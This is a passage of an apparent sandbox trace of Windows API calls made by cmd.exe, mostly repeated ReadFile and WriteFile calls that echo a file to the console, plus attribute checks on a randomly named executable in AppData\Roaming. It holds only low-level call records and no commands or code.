_Buffer=0x16f37c, _BufferCount=0x13, _Format="%08X", _ArgList=0x16f240 | out: _Buffer="00000000") returned 8 [0218.153] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0218.153] GetEnvironmentStringsW () returned 0x212558* [0218.153] FreeEnvironmentStringsW (penv=0x212558) returned 1 [0218.153] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0218.153] GetEnvironmentStringsW () returned 0x212558* [0218.153] FreeEnvironmentStringsW (penv=0x212558) returned 1 [0218.153] DeleteProcThreadAttributeList (in: lpAttributeList=0x16f298 | out: lpAttributeList=0x16f298) [0218.153] GetConsoleTitleW (in: lpConsoleTitle=0x16f618, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.154] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\desktop.ini" (normalized: "c:\\users\\eebsym5\\contacts\\desktop.ini")) returned 0x20 [0218.154] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts" (normalized: "c:\\users\\eebsym5\\contacts")) returned 0x11 [0218.154] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0218.154] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0218.154] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\desktop.ini" (normalized: "c:\\users\\eebsym5\\contacts\\desktop.ini")) returned 0x20 [0218.154] FindNextFileW (in: hFindFile=0x212c78, lpFindFileData=0x2135e4 | out: lpFindFileData=0x2135e4) returned 0 [0218.155] GetLastError () returned 0x12 [0218.155] FindClose (in: hFindFile=0x212c78 | out: hFindFile=0x212c78) returned 1 [0218.156] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0218.156] GetConsoleTitleW (in: lpConsoleTitle=0x16f5b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.156] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 
0x2020 [0218.156] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.156] GetFileType (hFile=0x50) returned 0x1 [0218.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.157] GetFileType (hFile=0x50) returned 0x1 [0218.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.157] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.158] GetFileType (hFile=0x50) returned 0x1 [0218.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.158] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.158] GetFileType (hFile=0x50) returned 0x1 [0218.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.158] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.158] GetFileType (hFile=0x50) returned 0x1 [0218.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.158] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.158] GetFileType (hFile=0x50) 
returned 0x1 [0218.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.158] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.158] GetFileType (hFile=0x50) returned 0x1 [0218.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.158] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.158] GetFileType (hFile=0x50) returned 0x1 [0218.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.158] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.158] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.158] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.159] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.159] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.159] GetFileType (hFile=0x50) returned 0x1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.159] GetFileType (hFile=0x50) returned 0x1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.159] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, 
lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.159] GetFileType (hFile=0x50) returned 0x1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.159] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.159] GetFileType (hFile=0x50) returned 0x1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.159] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.159] GetFileType (hFile=0x50) returned 0x1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.159] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.159] GetFileType (hFile=0x50) returned 0x1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.159] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.159] GetFileType (hFile=0x50) returned 0x1 [0218.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, 
lpOverlapped=0x0) returned 1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] GetFileType (hFile=0x50) returned 0x1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.160] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.160] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.160] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.160] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] GetFileType (hFile=0x50) returned 0x1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] GetFileType (hFile=0x50) returned 0x1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] GetFileType (hFile=0x50) returned 0x1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] GetFileType (hFile=0x50) returned 0x1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] WriteFile (in: hFile=0x50, 
lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] GetFileType (hFile=0x50) returned 0x1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] GetFileType (hFile=0x50) returned 0x1 [0218.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.160] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] GetFileType (hFile=0x50) returned 0x1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] GetFileType (hFile=0x50) returned 0x1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.161] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.161] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.161] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0218.161] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] GetFileType (hFile=0x50) returned 0x1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] GetFileType (hFile=0x50) returned 0x1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] GetFileType (hFile=0x50) returned 0x1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] GetFileType (hFile=0x50) returned 0x1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] GetFileType (hFile=0x50) returned 0x1 [0218.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.161] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] 
GetFileType (hFile=0x50) returned 0x1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] GetFileType (hFile=0x50) returned 0x1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] GetFileType (hFile=0x50) returned 0x1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.162] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.162] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.162] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.162] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] GetFileType (hFile=0x50) returned 0x1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] GetFileType (hFile=0x50) returned 0x1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | 
out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] GetFileType (hFile=0x50) returned 0x1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] GetFileType (hFile=0x50) returned 0x1 [0218.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.162] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] GetFileType (hFile=0x50) returned 0x1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] GetFileType (hFile=0x50) returned 0x1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] GetFileType (hFile=0x50) returned 0x1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, 
lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] GetFileType (hFile=0x50) returned 0x1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.163] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.163] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.163] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.163] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] GetFileType (hFile=0x50) returned 0x1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] GetFileType (hFile=0x50) returned 0x1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] GetFileType (hFile=0x50) returned 0x1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.163] GetFileType (hFile=0x50) returned 0x1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 
[0218.164] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.164] GetFileType (hFile=0x50) returned 0x1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.164] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.164] GetFileType (hFile=0x50) returned 0x1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.164] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.164] GetFileType (hFile=0x50) returned 0x1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.164] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.164] GetFileType (hFile=0x50) returned 0x1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.164] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.164] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.164] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) 
returned 1 [0218.164] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.164] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.164] GetFileType (hFile=0x50) returned 0x1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.164] GetFileType (hFile=0x50) returned 0x1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.164] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.164] GetFileType (hFile=0x50) returned 0x1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] GetFileType (hFile=0x50) returned 0x1 [0218.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] GetFileType (hFile=0x50) returned 0x1 [0218.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.165] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0218.165] GetFileType (hFile=0x50) returned 0x1 [0218.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] GetFileType (hFile=0x50) returned 0x1 [0218.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] GetFileType (hFile=0x50) returned 0x1 [0218.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, 